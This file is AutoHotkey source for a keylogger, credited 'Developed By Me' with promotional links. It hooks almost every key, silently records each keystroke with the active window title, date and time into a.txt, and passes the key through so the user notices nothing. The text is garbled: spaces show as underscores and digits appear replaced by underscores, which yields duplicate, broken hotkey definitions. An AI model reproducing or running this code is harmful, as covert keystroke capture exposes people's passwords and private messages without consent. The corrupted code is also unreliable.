;;__Developed__By__Me
;http://www.codeforme.digital/?code=__
;https://www.youtube.com/watch?v=Rxdi_ktWZzI

;#NoTrayIcon
#SingleInstance,__force
SetTitleMatchMode,___
str__:=__""
oldTitle__:=__""
writekeys(str,__oldTitle){
	file__:=__FileOpen("a.txt",__"a")
	file.Write("`r`n"__oldTitle__"`r`n"__str__"`r`n__------------------")
	file.Close()
}
setkey(key){
	;~__global__str
	;~__global__oldTitle
	FormatTime,__myTime,__A_Now,__h:mm:ss__tt
	FormatTime,__myDate,__A_Now,__dd/MM/yyyy
	date___:=__Format("{}{}__",key,TimeNow)
	WinGetTitle,__currentTitle,__A
	
	if__FileExist("a.txt")
	{
		FileRead,OutFile,__a.txt
		;~__s__[]__:=__StrSplit(currentTitle,'-')[_]
		;~__MsgBox__%__s
		

		;;__unique__windows__title__in__file
		if__inStr(OutFile,__StrSplit(currentTitle,"-__")[_])
		{
			;;__Check__if__date__exist
			if__(inStr(OutFile,myDate))
			{
				
				if__inStr(OutFile,__"-|"__LTrim(StrSplit(currentTitle,"-__")[_]))
				{
					posStr__:=__InStr(OutFile,"-|"__LTrim(StrSplit(currentTitle,"-__")[_]))
					delimStr__:=__SubStr(OutFile,posStr,StrLen("-|"__LTrim(StrSplit(currentTitle,"-__")[_])))
					if__(key__=__"`r`n")
					{
						key__:=__Format("{}{}__||__",key,myTime)
						key__:=__key__"-|"__LTrim(StrSplit(currentTitle,"-__")[_])
						newContent__:=__StrReplace(OutFile,delimStr,key)
					}
					else
					{
						key__:=__key__"-|"__LTrim(StrSplit(currentTitle,"-__")[_])
						newContent__:=__StrReplace(OutFile,delimStr,key)
					}

					FileDelete,__a.txt
					FileAppend,__%newContent%,__a.txt
				}
				else
				{
					posStr__:=__InStr(OutFile,"-|"__LTrim(StrSplit(currentTitle,"-__")[_]))
					delimStr__:=__SubStr(OutFile,posStr,StrLen("-|"__LTrim(StrSplit(currentTitle,"-__")[_])))
					if__(key__=__"`r`n")
					{
						key__:=__Format("{}{}__||__",key,myTime)
						key__:=__key__"-|"__LTrim(StrSplit(currentTitle,"-__")[_])
						newContent__:=__StrReplace(OutFile,delimStr,key)
					}
					else
					{
						key__:=__key__"-|"__LTrim(StrSplit(currentTitle,"-__")[_])
						newContent__:=__StrReplace(OutFile,delimStr,key)
					}
					
					;~__key__:=__key__"-|"__LTrim(StrSplit(currentTitle,"-__")[_])
					;~__newContent__:=__StrReplace(OutFile,delimStr,key)
					FileDelete,__a.txt
					FileAppend,__%newContent%,__a.txt

					;~__file__:=__FileOpen("a.txt",__"a")
					;~__file.Write(key)
					;~__file.Close()
					
					}
			}
			else
			{
				key__:=__key__"-|"__LTrim(StrSplit(currentTitle,"-__")[_])
				file__:=__FileOpen("a.txt",__"a")
				file.Write(Format("`r`n[{}]`r`n{}__||__",myDate,myTime))
				file.Write(key)
				file.Close()
			}
		}
		else
		{
			key__:=__key__"-|"__LTrim(StrSplit(currentTitle,"-__")[_])
			file__:=__FileOpen("a.txt",__"a")
			file.Write("`r`n------------------`r`n"__currentTitle__"`r`n------------------`r`n")
			file.Write(Format("[{}]`r`n{}__||__",myDate,myTime))
			file.Write(key)
			file.Close()
		}
		
		;~__FileRead,OutFile,__a.txt
		;~__if__inStr(OutFile,__currentTitle)
		;~__{
			;~__if__inStr(OutFile,__"|")
			;~__{
				;~__end__:=__inStr(OutFile,__"|")
				;~__res__:=__"__"__key
				;~__replace__:=__StrReplace(OutFile,__"|",__res)
				;~__file__:=__FileOpen("a.txt",__"w")
				;~__file.Write(replace)
				;~__file.Close()
			;~__}
			;~__else
			;~__{
				;~__file__:=__FileOpen("a.txt",__"a")
				;~__file.Write(key)
				;~__file.Close()
			;~__}
				
		;~__}
		;~__else
		;~__{
			;~__;;__new__Program__Open
			;~__file__:=__FileOpen("a.txt",__"a")
			;~__file.Write("`r`n"__currentTitle__"`r`n__------------------")
			;~__file.Close()
		;~__}
	}
	else
	{
		key__:=__key__"-|"__LTrim(StrSplit(currentTitle,"-__")[_])
		;~__start__:=__Format("{}",timeNow)
		;~__if__(key__=__"`r`n")
		;~__{
			;~__key__:=__Format("{}{}__",key,TimeNow)
		;~__}
		file__:=__FileOpen("a.txt",__"a")
		;~__file.Write("`r`n__------------------`"__currentTitle__"`r`n__------------------")
		file.Write("------------------`r`n"__currentTitle__"`r`n------------------`r`n")
		file.Write(Format("[{}]`r`n{}__||__",myDate,myTime))
		file.Write(key)
		file.Close()
	}
	
	;~__if(currentTitle__<>__oldTitle){
		;~__;;__new__program__open
		;~__writekeys(str,__oldTitle)
		;~__str__:=""
		;~__oldTitle__:=__currentTitle
		;~__file__:=__FileOpen("a.txt",__"a")
		;~__file.Write("`r`n"__oldTitle__"`r`n"__str__"`r`n__------------------")
		;~__file.Write(key)
	;~__}
	;~__else
	;~__{
		;~__file__:=__FileOpen("a.txt",__"a")
		;~__file.Write(key)
	;~__}
	;~__str__=__%str%%key%
	

	
}

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
a::
	setkey("a")
	hotkey,__a,__off
	send,__a
	hotkey,__a,__on
return
+a::
	setkey("A")
	hotkey,__+a,__off
	send,__A
	hotkey,__+a,__on
return
b::
	setkey("b")
	hotkey,__b,__off
	send,__b
	hotkey,__b,__on
return
+b::
	setkey("B")
	hotkey,__+b,__off
	send,__B
	hotkey,__+b,__on
return
c::
	setkey("c")
	hotkey,__c,__off
	send,__c
	hotkey,__c,__on
return
+c::
	setkey("C")
	hotkey,__+c,__off
	send,__C
	hotkey,__+c,__on
return
d::
	setkey("d")
	hotkey,__d,__off
	send,__d
	hotkey,__d,__on
return
+d::
	setkey("D")
	hotkey,__+d,__off
	send,__D
	hotkey,__+d,__on
return
e::
	setkey("e")
	hotkey,__e,__off
	send,__e
	hotkey,__e,__on
return
+e::
	setkey("E")
	hotkey,__+e,__off
	send,__E
	hotkey,__+e,__on
return
f::
	setkey("f")
	hotkey,__f,__off
	send,__f
	hotkey,__f,__on
return
+f::
	setkey("F")
	hotkey,__+f,__off
	send,__F
	hotkey,__+f,__on
return
g::
	setkey("g")
	hotkey,__g,__off
	send,__g
	hotkey,__g,__on
return
+g::
	setkey("G")
	hotkey,__+g,__off
	send,__G
	hotkey,__+g,__on
return
h::
	setkey("h")
	hotkey,__h,__off
	send,__h
	hotkey,__h,__on
return
+h::
	setkey("H")
	hotkey,__+h,__off
	send,__H
	hotkey,__+h,__on
return
i::
	setkey("i")
	hotkey,__i,__off
	send,__i
	hotkey,__i,__on
return
+i::
	setkey("I")
	hotkey,__+i,__off
	send,__I
	hotkey,__+i,__on
return
j::
	setkey("j")
	hotkey,__j,__off
	send,__j
	hotkey,__j,__on
return
+j::
	setkey("J")
	hotkey,__+j,__off
	send,__J
	hotkey,__+j,__on
return
k::
	setkey("k")
	hotkey,__k,__off
	send,__k
	hotkey,__k,__on
return
+k::
	setkey("K")
	hotkey,__+k,__off
	send,__K
	hotkey,__+k,__on
return
l::
	setkey("l")
	hotkey,__l,__off
	send,__l
	hotkey,__l,__on
return
+l::
	setkey("L")
	hotkey,__+l,__off
	send,__L
	hotkey,__+l,__on
return
m::
	setkey("m")
	hotkey,__m,__off
	send,__m
	hotkey,__m,__on
return
+m::
	setkey("M")
	hotkey,__+m,__off
	send,__M
	hotkey,__+m,__on
return
n::
	setkey("n")
	hotkey,__n,__off
	send,__n
	hotkey,__n,__on
return
+n::
	setkey("N")
	hotkey,__+n,__off
	send,__N
	hotkey,__+n,__on
return
o::
	setkey("o")
	hotkey,__o,__off
	send,__o
	hotkey,__o,__on
return
+o::
	setkey("O")
	hotkey,__+o,__off
	send,__O
	hotkey,__+o,__on
return
p::
	setkey("p")
	hotkey,__p,__off
	send,__p
	hotkey,__p,__on
return
+p::
	setkey("P")
	hotkey,__+p,__off
	send,__P
	hotkey,__+p,__on
return
q::
	setkey("q")
	hotkey,__q,__off
	send,__q
	hotkey,__q,__on
return
+q::
	setkey("Q")
	hotkey,__+q,__off
	send,__Q
	hotkey,__+q,__on
return
r::
	setkey("r")
	hotkey,__r,__off
	send,__r
	hotkey,__r,__on
return
+r::
	setkey("R")
	hotkey,__+r,__off
	send,__R
	hotkey,__+r,__on
return
s::
	setkey("s")
	hotkey,__s,__off
	send,__s
	hotkey,__s,__on
return
+s::
	setkey("S")
	hotkey,__+s,__off
	send,__S
	hotkey,__+s,__on
return
t::
	setkey("t")
	hotkey,__t,__off
	send,__t
	hotkey,__t,__on
return
+t::
	setkey("T")
	hotkey,__+t,__off
	send,__T
	hotkey,__+t,__on
return
u::
	setkey("u")
	hotkey,__u,__off
	send,__u
	hotkey,__u,__on
return
+u::
	setkey("U")
	hotkey,__+u,__off
	send,__U
	hotkey,__+u,__on
return
v::
	setkey("v")
	hotkey,__v,__off
	send,__v
	hotkey,__v,__on
return
+v::
	setkey("V")
	hotkey,__+v,__off
	send,__V
	hotkey,__+v,__on
return
w::
	setkey("w")
	hotkey,__w,__off
	send,__w
	hotkey,__w,__on
return
+w::
	setkey("W")
	hotkey,__+w,__off
	send,__W
	hotkey,__+w,__on
return
x::
	setkey("x")
	hotkey,__x,__off
	send,__x
	hotkey,__x,__on
return
+x::
	setkey("X")
	hotkey,__+x,__off
	send,__X
	hotkey,__+x,__on
return
y::
	setkey("y")
	hotkey,__y,__off
	send,__y
	hotkey,__y,__on
return
+y::
	setkey("Y")
	hotkey,__+y,__off
	send,__Y
	hotkey,__+y,__on
return
z::
	setkey("z")
	hotkey,__z,__off
	send,__z
	hotkey,__z,__on
return
+z::
	setkey("Z")
	hotkey,__+z,__off
	send,__Z
	hotkey,__+z,__on
return


_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,___,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
Numpad_::
	setkey("_")
	hotkey,__Numpad_,__off
	hotkey,___,__off
	send,___
	hotkey,___,__on
	hotkey,__Numpad_,__on
return
NumpadDiv::
	setkey("/")
	hotkey,__NumpadDiv,__off
	hotkey,__/,__off
	send,__/
	hotkey,__/,__on
	hotkey,__NumpadDiv,__on
return
NumpadMult::
	setkey("*")
	hotkey,__*,__off
	hotkey,__NumpadMult,__off
	send,__*
	hotkey,__*,__on
	hotkey,__NumpadMult,__on
return
NumpadAdd::
	setkey("+")
	hotkey,__+,__off
	hotkey,__NumpadAdd,__off
	sendraw,__+
	hotkey,__NumpadAdd,__on
	hotkey,__+,__on
return
NumpadSub::
	setkey("-")
	hotkey,__-,__off
	hotkey,__NumpadSub,__off
	send,__-
	hotkey,__NumpadSub,__on
	hotkey,__-,__on
return
NumpadEnter::
	setkey("`r`n")
	hotkey,__NumpadEnter,__off
	send,__{NumpadEnter}
	hotkey,__NumpadEnter,__on
return

Enter::
	setkey("`r`n")
	hotkey,__Enter,__off
	send,__{Enter}
	hotkey,__Enter,__on
return
Space::
	setkey("__")
	hotkey,__Space,__off
	send,__{Space}
	hotkey,__Space,__on
return

Backspace::
	setkey("{Backspace}")
	hotkey,__Backspace,__off
	send,__{Backspace}
	hotkey,__Backspace,__on
return


.::
	setkey(".")
	hotkey,__.,__off
	send,__.
	hotkey,__.,__on
return
&::
	setkey("&")
	hotkey,__&,__off
	send,__&
	hotkey,&,__on
return
_::
	setkey("_")
	hotkey,___,__off
	send,___
	hotkey,_,__on
return
:::
	setkey(":")
	hotkey,__:,__off
	send,__:
	hotkey,:,__on
return
@::
	setkey("@")
	hotkey,__@,__off
	send,__@
	hotkey,@,__on
return
[::
	setkey("[")
	hotkey,__[,__off
	send,__[
	hotkey,[,__on
return
]::
	setkey("]")
	hotkey,__],__off
	send,__]
	hotkey,],__on
return
)::
	setkey(")")
	hotkey,__),__off
	send,__)
	hotkey,__),__on
return

(::
	setkey("(")
	hotkey,__(,__off
	send,__(
	hotkey,__(,__on
return


;~__°::
	;~__setkey("°")
	;~__hotkey,__°,__off
	;~__send,__°
	;~__hotkey,__°,__on
;~__return
-::
	setkey("-")
	hotkey,__-,__off
	sendraw,__-
	hotkey,__-,__on
return
+::
	setkey("+")
	hotkey,__+,__off
	sendraw,__+
	hotkey,__+,__on
return
*::
	setkey("*")
	hotkey,__*,__off
	send,__*
	hotkey,__*,__on
return
=::
	setkey("=")
	hotkey,__=,__off
	send,__=
	hotkey,__=,__on
return
